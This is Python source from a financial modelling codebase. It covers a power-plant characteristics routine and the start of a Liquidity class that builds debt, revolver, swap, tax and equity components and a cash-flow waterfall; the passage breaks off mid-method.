hhl_temp_ready_to_kean_df = temp_ready_to_kean_df
hhl_temp_ready_to_kean_df['value'] = hhl_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_hr(row, heatrate_high_load_summer, heatrate_high_load_winter), axis=1)
hhl_temp_ready_to_kean_df['characteristic'] = 'heatrate_high_load'
hhl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hhl_temp_ready_to_kean_df)
""" heatrate_max_load """
heatrate_max_load_summer = row['summer_duct_heatrate']
heatrate_max_load_winter = row['winter_duct_heatrate']
hml_temp_ready_to_kean_df = temp_ready_to_kean_df
hml_temp_ready_to_kean_df['value'] = hml_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_hr(row, heatrate_max_load_summer, heatrate_max_load_winter), axis=1)
hml_temp_ready_to_kean_df['characteristic'] = 'heatrate_max_load'
hml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hml_temp_ready_to_kean_df)
""" heatrate_min_load """
heatrate_min_load_summer = row['summer_base_heatrate'] * row['lol_summer_heatrate']
heatrate_min_load_winter = row['winter_base_heatrate'] * row['lol_winter_heatrate']
hminl_temp_ready_to_kean_df = temp_ready_to_kean_df
hminl_temp_ready_to_kean_df['value'] = hminl_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_hr(row, heatrate_min_load_summer, heatrate_min_load_winter), axis=1)
hminl_temp_ready_to_kean_df['characteristic'] = 'heatrate_min_load'
hminl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hminl_temp_ready_to_kean_df)
""" high_load """
high_load_summer = row['summer_base_capacity']
high_load_winter = row['winter_base_capacity']
hl_temp_ready_to_kean_df = temp_ready_to_kean_df
hl_temp_ready_to_kean_df['value'] = hl_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, high_load_summer, high_load_winter), axis=1)
hl_temp_ready_to_kean_df['characteristic'] = 'high_load'
hl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hl_temp_ready_to_kean_df)
""" max_load """
max_load_summer = row['summer_duct_capacity']
max_load_winter = row['winter_duct_capacity']
ml_temp_ready_to_kean_df = temp_ready_to_kean_df
ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, max_load_summer, max_load_winter), axis=1)
ml_temp_ready_to_kean_df['characteristic'] = 'max_load'
ml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
""" min_load """
min_load_summer = row['summer_base_capacity'] * row['lol_capacity']
min_load_winter = row['winter_base_capacity'] * row['lol_capacity']
ml_temp_ready_to_kean_df = temp_ready_to_kean_df
ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, min_load_summer, min_load_winter), axis=1)
ml_temp_ready_to_kean_df['characteristic'] = 'min_load'
ml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
""" offpeak_power_hub_instrument_id """
offpeak_power_hub_instrument_id = row['power_hub_off_peak']
oph_temp_ready_to_kean_df = temp_ready_to_kean_df
oph_temp_ready_to_kean_df['value_str'] = offpeak_power_hub_instrument_id
oph_temp_ready_to_kean_df['value'] = 0.0
oph_temp_ready_to_kean_df['characteristic'] = 'offpeak_power_hub_instrument_id'
total_plant_temp_df = total_plant_temp_df.append(oph_temp_ready_to_kean_df)
""" onpeak_power_hub_instrument_id """
onpeak_power_hub_instrument_id = row['power_hub_on_peak']
onph_temp_ready_to_kean_df = temp_ready_to_kean_df
onph_temp_ready_to_kean_df['value_str'] = onpeak_power_hub_instrument_id
onph_temp_ready_to_kean_df['value'] = 0.0
onph_temp_ready_to_kean_df['characteristic'] = 'onpeak_power_hub_instrument_id'
total_plant_temp_df = total_plant_temp_df.append(onph_temp_ready_to_kean_df)
""" outage_days """
outage_start_date = row['first_plan_outage_start']
outage_end_date = row['first_plan_outage_end']
od_temp_ready_to_kean_df = temp_ready_to_kean_df
od_temp_ready_to_kean_df['value'] = od_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_outage_days(row, outage_start_date, outage_end_date), axis=1)
od_temp_ready_to_kean_df['value_str'] = ''
od_temp_ready_to_kean_df['characteristic'] = 'outage_days'
total_plant_temp_df = total_plant_temp_df.append(od_temp_ready_to_kean_df)
""" dafault to 0s """
for char in ['ramp_dowm_cold_hours', 'ramp_down_warm_hours', 'ramp_energy_cold', 'ramp_energy_warm', 'ramp_fuel_warm', 'ramp_up_warm_hours']:
temp_char_df = temp_ready_to_kean_df
temp_char_df['value'] = 0.0
temp_char_df['value_str'] = ''
temp_char_df['characteristic'] = char
total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
""" ramp_fuel_cold """
ramp_fuel_cold_summer = row['start_fuel'] * row['summer_duct_capacity']
ramp_fuel_cold_winter = row['start_fuel'] * row['winter_duct_capacity']
rfc_temp_ready_to_kean_df = temp_ready_to_kean_df
rfc_temp_ready_to_kean_df['value'] = rfc_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, ramp_fuel_cold_summer, ramp_fuel_cold_winter), axis=1)
rfc_temp_ready_to_kean_df['value_str'] = ''
rfc_temp_ready_to_kean_df['characteristic'] = 'ramp_fuel_cold'
total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
""" ramp_up_cold_hours """
ramp_up_cold_hours = row['start_hours']
ruch_temp_ready_to_kean_df = temp_ready_to_kean_df
ruch_temp_ready_to_kean_df['value'] = ramp_up_cold_hours
ruch_temp_ready_to_kean_df['value_str'] = ''
ruch_temp_ready_to_kean_df['characteristic'] = 'ramp_up_cold_hours'
total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
""" start_cost """
start_cost_summer = row['start_expense'] * row['summer_duct_capacity']
start_cost_winter = row['start_expense'] * row['winter_duct_capacity']
sc_temp_ready_to_kean_df = temp_ready_to_kean_df
sc_temp_ready_to_kean_df['value'] = sc_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, start_cost_summer, start_cost_winter), axis=1)
sc_temp_ready_to_kean_df['value_str'] = ''
sc_temp_ready_to_kean_df['characteristic'] = 'start_cost'
total_plant_temp_df = total_plant_temp_df.append(sc_temp_ready_to_kean_df)
""" units """
u_temp_char_df = temp_ready_to_kean_df
u_temp_char_df['value'] = 1
u_temp_char_df['value_str'] = ''
u_temp_char_df['characteristic'] = 'units'
total_plant_temp_df = total_plant_temp_df.append(u_temp_char_df)
""" vom_high_load vom_max_load vom_min_load """
vom = row['vom']
for char in ['vom_high_load', 'vom_max_load', 'vom_min_load']:
temp_char_df = temp_ready_to_kean_df
temp_char_df['value'] = temp_char_df.apply(lambda row: dispatchUtils.get_escalated_value(vom, escalation, row['period']), axis=1)
temp_char_df['value_str'] = ''
temp_char_df['characteristic'] = char
total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
total_plant_temp_df['entity'] = plant_name
total_plant_temp_df['unit'] = 'all'
total_plant_temp_df['scenario'] = scenario
total_plant_temp_df['version'] = version
ready_to_kean_pcuc_df = ready_to_kean_pcuc_df.append(total_plant_temp_df)
if push_to_kean:
dbPCUC.put_characteristics(ready_to_kean_pcuc_df, scenario, version)
return ready_to_kean_pcuc_df
""" Liquidity related operations """
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,744 | changliukean/KEAN3 | refs/heads/master | /liquidity/Liquidity.py | from scenario_control.Scenario import Scenario, ScenarioMaster
from datetime import date, timedelta
from dateutil import relativedelta
from utility.dateUtils import get_date_obj_from_str
from calendar import monthrange
import numpy as np
from decimal import *
import pandas as pd
import sys
from scipy.optimize import fsolve
from utility import dateUtils
from database import dbLiquidity
a=1
class Liquidity:
def __init__(self,
portfolio,
liquidity_scenario,
liquidity_version,
metadata={},
table='placeholder'):
self.portfolio = portfolio
self.scenarioMaster = ScenarioMaster(Scenario('liquidity', table, portfolio, liquidity_scenario, liquidity_version))
# this is a ScenarioMaster object that stores all the related scenario master information for a liquidity run
# 1. financials, basically all financial information for the liquidity scenario including Adj EBITDA, CAPEX, actual cash begin and ending balances etc
# 1.1 libor curves along with the financials SM object
# 2. capital structure scenario, all capital structure information including Operting Company, Term Loans, Equity, Revolver
# 3. waterfall structure scenario, a defined waterfall for how cash should flow and the priorities of different tier debts
# 4. liquidity assumptions scenario and version, the forced values for change in working capital, other cash use and revolver draw and pay back
# 5. interest rate scenario and version, the libor rates information stored in prices table
# 6. dates and time information for the liquidity e.g. forecast start date, actuals begin date
self.scenarioMaster.load_sm_fromdb()
self.scenarioMaster.load_scenario_datetime_fromdb()
self.assumptions = self.__initialize_liquidity_assumptions()
# this is the scenario assumptions that are related to the liquidity process
# including items like: change in working capital, other cash use, projected revolver draw and repay
self.interestRates = self.__initialize_interest_rate()
# a dataframe of interest rates, being used within liquidity module at multiple places
self.capitalStructure = self.__initialize_captital_structure()
# captial structure is the list of instruments that this liquidity model has
# will be reading information from its scenarioMaster object and initialize all objects
self.waterfall = self.__initialize_waterfall()
# waterfall information is a dataframe of cash inflow/outflow orders and priorities
# for the direction of a waterfall item, positive inflow is an income and negative inflow means an outcome or expense
self.fixedAssets = self.__initializ_fixed_asset_depreciation()
# a list of fixed assets objects for the purpose of tax distribution calcualtion
self.metadata = self.__initialize_metadata()
# a dictionary of dataframes that store all support information
def __initialize_liquidity_assumptions(self):
liquidity_assumptions_obj = [input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'liquidity_assumptions'][0]
liquidity_assumptions_scenario = liquidity_assumptions_obj.scenario
liquidity_assumptions_version = liquidity_assumptions_obj.version
# method to call database and get financials information for EBITDA and Capex
scenario_assumptions_df = dbLiquidity.get_scenario_assumptions(self.portfolio, liquidity_assumptions_scenario, liquidity_assumptions_version)
return scenario_assumptions_df
def __initialize_interest_rate(self):
libor_scenario = [ input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'interest_rate' ][0].scenario
libor_version = [ input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'interest_rate' ][0].version
libor_df = dbLiquidity.get_curves(libor_scenario, libor_version)
return libor_df
def __initialize_captital_structure(self):
# 1. capital structure
capital_structure = [input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'cap_structure'][0]
capital_structure_scenario = capital_structure.scenario
capital_structure_version = capital_structure.version
capital_structure_df = dbLiquidity.get_capital_structure(self.portfolio, capital_structure_scenario, capital_structure_version)
""" for each component the instrument id field should be called label so to be able to get the distinct components """
unique_components_df = capital_structure_df.loc[capital_structure_df.field_name=='label']
capital_structure = []
for index, row in unique_components_df.iterrows():
component = row['capital_component']
component_cap_structure_df = capital_structure_df.loc[capital_structure_df.capital_component==component].copy()
if component == 'Revolver':
credit_line = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'credit_line'].iloc[0]['value'])
min_cash_reserve_revolver = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'min_cash_reserve_revolver'].iloc[0]['value'])
""" multiple margin records """
margins = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'margin'][['value','effective_start_date', 'effective_end_date']].values.tolist()
index = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'index'].iloc[0]['value']
instrument_id = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'label'].iloc[0]['value']
issue_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'issue_date'].iloc[0]['value'])
maturity_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'maturity_date'].iloc[0]['value'])
term = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'term'].iloc[0]['value'])
initial_balance = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'initial_balance'].iloc[0]['value'])
interest_start_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'interest_start_date'].iloc[0]['value'])
amort_start_date = date(1900,1,1)
periodicity_months = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'periodicity_months'].iloc[0]['value'])
annual_scheduled_amort = 0
day_count = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'day_count'].iloc[0]['value']
min_cash_reserve_prepay = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'min_cash_reserve_revolver'].iloc[0]['value']
sweep_percent=1
dsra_months=0
oids=[]
dfcs=[]
oid_payments={}
dfc_payments={}
upsizes={}
prepays={}
effective_interest_rates={}
interest_payments={}
required_dsras={}
dsra_cash_movement={}
amortizations={}
principal_balances ={}
flag_prepayable=True
flag_historicals = True if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'flag_historicals'].iloc[0]['value'] == 'TRUE' else False
revolver = Revolver(credit_line,
min_cash_reserve_revolver,
margins,
index,
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count,
sweep_percent,
dsra_months,
oids,
dfcs,
oid_payments,
dfc_payments,
upsizes,
prepays,
effective_interest_rates,
interest_payments,
required_dsras,
dsra_cash_movement,
amortizations,
principal_balances,
flag_prepayable,
flag_historicals)
revolver.set_historical_revolver_change(self.scenarioMaster.forecastStartMonth)
revolver.set_projected_revolver_change(self.scenarioMaster.forecastStartMonth, self.assumptions)
""" revolver has no floor on interest rates """
revolver.set_effective_interest_rates(self.interestRates, self.scenarioMaster.forecastStartMonth)
capital_structure.append(revolver)
if component in ['TLB', 'TLC']:
margins = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'margin'][['value','effective_start_date', 'effective_end_date']].values.tolist()
index = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'index']['value'].iloc[0]
instrument_id = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'label'].iloc[0]['value']
issue_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'issue_date'].iloc[0]['value'])
maturity_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'maturity_date'].iloc[0]['value'])
term = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'term'].iloc[0]['value'])
initial_balance = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'initial_balance'].iloc[0]['value'])
interest_start_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'interest_date_start'].iloc[0]['value'])
amort_start_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'amort_date_start'].iloc[0]['value'])
periodicity_months = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'periodicity_months'].iloc[0]['value'])
annual_scheduled_amort = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'annual_schedule_amort'].iloc[0]['value'])
annual_scheduled_amort_type = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'annual_schedule_amort'].iloc[0]['value_type']
if annual_scheduled_amort_type == 'percentage':
annual_scheduled_amort = annual_scheduled_amort / 100
day_count = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'day_count'].iloc[0]['value']
sweep_percent = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'sweep_percent'].iloc[0]['value'])
dsra_months = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'dsra_months'].iloc[0]['value'])
oids = [] # a list of OID objects OID(balance, begin_date, end_date, oid_discount)
dfcs = [] # a list of DFC objects DFC(balance, begin_date, end_date, oid_discount)
oid_payments = {}
dfc_payments = {}
upsizes = {}
prepays = {}
effective_interest_rates = {}
interest_payments = {}
required_dsras = {}
dsra_cash_movement = {}
amortizations = {}
principal_balances = {}
flag_prepayable = True if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'flag_prepayable'].iloc[0]['value'] == 'TRUE' else False
flag_historicals = True if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'flag_historicals'].iloc[0]['value'] == 'TRUE' else False
min_cash_reserve_prepay = 0
flag_dsra_fund_by_lc = True if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'flag_dsra_fund_by_lc'].iloc[0]['value'] == 'TRUE' else False
if flag_prepayable:
min_cash_reserve_prepay = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'prepay_min_cash_reserve'].iloc[0]['value'])
if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'class'].iloc[0]['value'] == 'FloatingDebt':
floating_debt = FloatingDebt(margins, # only floating debt has margin
index, # only floating debt has index
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count,
sweep_percent,
dsra_months,
oids, # a list of OID objects
dfcs, # a list of DFC objects
oid_payments,
dfc_payments,
upsizes,
prepays,
effective_interest_rates,
interest_payments,
required_dsras,
dsra_cash_movement,
amortizations,
principal_balances,
flag_prepayable,
flag_historicals)
debt_activity_df = floating_debt.set_historical_size_change(self.scenarioMaster.forecastStartMonth)[2]
floating_debt.set_historical_interest_payments(self.scenarioMaster.forecastStartMonth, debt_activity_df)
floating_debt.set_historical_amortization(self.scenarioMaster.forecastStartMonth, debt_activity_df)
floating_debt.set_effective_interest_rates(self.interestRates, self.scenarioMaster.forecastStartMonth, floor=0.01)
capital_structure.append(floating_debt)
if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'class'].iloc[0]['value'] == 'FixedDebt':
""" for fixeddebt, the interest is a fixed constant """
fixed_rate = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'fixed_rate']['value'].iloc[0]
fixed_rate = float(fixed_rate)
fixed_debt = FixedDebt(fixed_rate,
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count,
sweep_percent,
dsra_months,
oids, # a list of OID objects
dfcs, # a list of DFC objects
oid_payments,
dfc_payments,
upsizes,
prepays,
effective_interest_rates,
interest_payments,
required_dsras,
dsra_cash_movement,
amortizations,
principal_balances,
flag_prepayable,
flag_historicals,
flag_dsra_fund_by_lc)
debt_activity_df = fixed_debt.set_historical_size_change(self.scenarioMaster.forecastStartMonth)[2]
fixed_debt.set_historical_interest_payments(self.scenarioMaster.forecastStartMonth, debt_activity_df)
fixed_debt.set_historical_amortization(self.scenarioMaster.forecastStartMonth, debt_activity_df)
fixed_debt.set_effective_interest_rates()
fixed_debt.build_principal_balances()
capital_structure.append(fixed_debt)
if component in ['OpCo']:
financials_scenario_obj = [input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'financials'][0]
financials_scenario = financials_scenario_obj.scenario
financials_version = financials_scenario_obj.version
financials_table = financials_scenario_obj.table
working_capital={}
other_cash_use={}
liquidity_assumptions_df = self.assumptions
# potentially needs a data type conversion here
working_capital = liquidity_assumptions_df.loc[liquidity_assumptions_df.account=='Change In Working Capital'][['date_end','value']].set_index('date_end')['value'].to_dict()
other_cash_use = liquidity_assumptions_df.loc[liquidity_assumptions_df.account=='Other Cash Use'][['date_end','value']].set_index('date_end')['value'].to_dict()
opco = OperatingCompany(self.portfolio,
financials_scenario,
financials_version,
financials_table,
ebitda={},
capex={},
working_capital=working_capital,
other_cash_use=other_cash_use)
capital_structure.append(opco)
if component in ['TaxRegister']:
effective_tax_rate = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'effective_tax_rate'].iloc[0]['value']
tax_split_ratio_list = component_cap_structure_df.loc[component_cap_structure_df.field_name.str.contains('tax_split')][['field_name', 'value']].values.tolist()
tax_split_ratio_list.sort(key = lambda x: x[0])
tax_split_ratio_list = [float(item[1]) for item in tax_split_ratio_list]
tax_register = TaxRegister(self.portfolio, effective_tax_rate=float(effective_tax_rate), tax_split_ratio=tax_split_ratio_list, paid_tax={})
capital_structure.append(tax_register)
if 'swap' in component.lower():
instrument_id = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'instrument_id'].iloc[0]['value']
trade_date = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'trade_date'].iloc[0]['value']
counterparty = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'counterparty'].iloc[0]['value']
index = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'index'].iloc[0]['value']
swap_rates = [[]]
swap = Swap(self.portfolio, instrument_id, index, trade_date, counterparty, swap_rates)
swap.get_swap_rates_from_db()
capital_structure.append(swap)
if component in ['Equity']:
purchase_price = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'purchase_price'].iloc[0]['value']
purchase_price = float(purchase_price)
debt_percentage = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'debt_percentage'].iloc[0]['value']
debt_percentage_value_type = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'debt_percentage'].iloc[0]['value_type']
if debt_percentage_value_type == 'percentage':
debt_percentage = float(debt_percentage) / 100
name = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'name'].iloc[0]['value']
exit_multiple = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'exit_multiple'].iloc[0]['value']
exit_multiple = float(exit_multiple)
irr_frequency = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'irr_frequency'].iloc[0]['value']
exit_time = dateUtils.get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'exit_time'].iloc[0]['value'])
periodicity_months = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'periodicity_months'].iloc[0]['value'])
equity_component = Equity(name, purchase_price, debt_percentage, exit_multiple, irr_frequency, exit_time, periodicity_months)
capital_structure.append(equity_component)
self.capitalStructure = capital_structure
return capital_structure
# # 2. waterfall
# waterfall = [input_scenario for input_scenario in self.ScenarioMaster.inputScenarios.scenario if input_scenario.module == 'waterfall'][0]
# waterfall_scenario = waterfall.scenario
# waterfall_version = waterfall.version
def __initialize_waterfall(self):
waterfall_scenario = [input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'waterfall'][0].scenario
waterfall_version = [input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'waterfall'][0].version
waterfall_df = dbLiquidity.get_waterfall(self.portfolio, waterfall_scenario, waterfall_version)
waterfall_df = waterfall_df.sort_values(['level','sub_level'], ascending=[True, True])
return waterfall_df
def __initialize_metadata(self):
sorted_months_index = list(sorted((set(self.scenarioMaster.actualMonths + self.scenarioMaster.forecastMonths))))
# waterfall_df = self.waterfall.copy()
# waterfall_df = waterfall_df.sort_values(["level", "sub_level"], ascending=(True, True))
# waterfall_df['instrument_name'] = waterfall_df['instrument'] + " - " + waterfall_df['item']
# all_instrument_names = list(waterfall_df['instrument_name'])
# all_instrument_names.insert(0, 'Beginning Cash Balance')
# all_instrument_names.insert(len(all_instrument_names), 'Ending Cash Balance')
cashflow_df = pd.DataFrame(index=sorted_months_index, columns=['Beginning Cash Balance'], data=0)
# metadata_df.to_csv("metadata_df.csv")
# metadata_df.T.to_csv("metadata_df_T.csv")
return {'cashflow': cashflow_df}
def set_cashflow_with_waterfall(self):
level = 1
max_level = self.waterfall.level.max()
while level <= max_level:
level_related_component = self.waterfall.loc[self.waterfall.level == level]
sub_level = 1
max_sub_level = level_related_component.sub_level.max()
while sub_level <= max_sub_level:
selected_sub_level_component_df = level_related_component.loc[level_related_component.sub_level == sub_level]
for index, selected_sub_level_component in selected_sub_level_component_df.iterrows():
""" Operating Company related components """
if selected_sub_level_component.instrument == 'OpCo':
operating_company = [capital_component for capital_component in self.capitalStructure if isinstance(capital_component, OperatingCompany)][0]
if selected_sub_level_component['item'].upper() == 'EBITDA':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(operating_company.ebitda)
if selected_sub_level_component['item'].upper() == 'Capex'.upper():
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(operating_company.capex)
if selected_sub_level_component['item'].lower() == 'working capital':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(operating_company.workingCapital)
if selected_sub_level_component['item'].lower() == 'other cash use':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(operating_company.otherCashUse)
if selected_sub_level_component['item'].lower() == 'cfo':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(operating_company.build_cfo())
""" Revolver related components """
if selected_sub_level_component.instrument == 'Revolver':
revolver = [capital_component for capital_component in self.capitalStructure if isinstance(capital_component, Revolver)][0]
if selected_sub_level_component['item'].lower() == 'draw':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(revolver.upsizes)
if selected_sub_level_component['item'].lower() == 'repay':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = - pd.Series(revolver.prepays)
if selected_sub_level_component['item'].lower() == 'interest expense':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = - pd.Series(revolver.interestPayments)
""" Term Loan related components """
if selected_sub_level_component.instrument in ['TLB', 'TLC']:
tl_obj = [capital_component for capital_component in self.capitalStructure if isinstance(capital_component, Debt) and capital_component.instrumentID == self.portfolio + " " + selected_sub_level_component.instrument][0]
if selected_sub_level_component['item'].lower() == 'interest expense':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(tl_obj.interestPayments)
if selected_sub_level_component['item'].lower() == 'amortization':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(tl_obj.amortizations)
if selected_sub_level_component['item'].lower() == 'dsra release':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = 0.0
if selected_sub_level_component['item'].lower() == 'prepayment':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = - pd.Series(tl_obj.prepays)
if selected_sub_level_component['item'].lower() == 'upsize':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(tl_obj.upsizes)
""" Portfolio level """
if selected_sub_level_component.instrument in ['Portfolio']:
""" permitted tax distribution """
if selected_sub_level_component['item'].lower() == 'ptd':
distributions = dbLiquidity.get_distributions(self.portfolio)
distributions = [item for item in distributions if item < self.scenarioMaster.forecastStartMonth]
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = pd.Series(distributions)
if selected_sub_level_component.instrument in ['Equity']:
if selected_sub_level_component['item'].lower() == 'sweep':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = 0.0
if selected_sub_level_component.instrument in ['Swap']:
if selected_sub_level_component['item'].lower() == 'interest expense':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = 0.0
if selected_sub_level_component.instrument in ['TaxRegister']:
if selected_sub_level_component['item'].lower() == 'ptd':
self.metadata['cashflow'][selected_sub_level_component.instrument + " - " + selected_sub_level_component['item'].lower()] = 0.0
sub_level += 1
level += 1
""" analyze liquidity method has more customizations for existing portfolio """
def analyze_liquidity(self):
""" step 1, build initial cash balances """
cash_balances_df = dbLiquidity.get_cash_balance(self.portfolio, self.scenarioMaster.forecastStartMonth)
self.__build_beginning_cash(cash_balances_df)
""" step 2, build debt related components """
debt_components = [item for item in self.capitalStructure if isinstance(item, FloatingDebt)]
for debt_item in debt_components:
""" step 2.1 build balance """
debt_item.build_principal_balances()
""" step 3, build swap related components """
swap_components = [item for item in self.capitalStructure if isinstance(item, Swap)]
total_swap_interest_payment_df = pd.DataFrame()
total_swap_detail_df = pd.DataFrame()
for swap_item in swap_components:
""" step 3.1 """
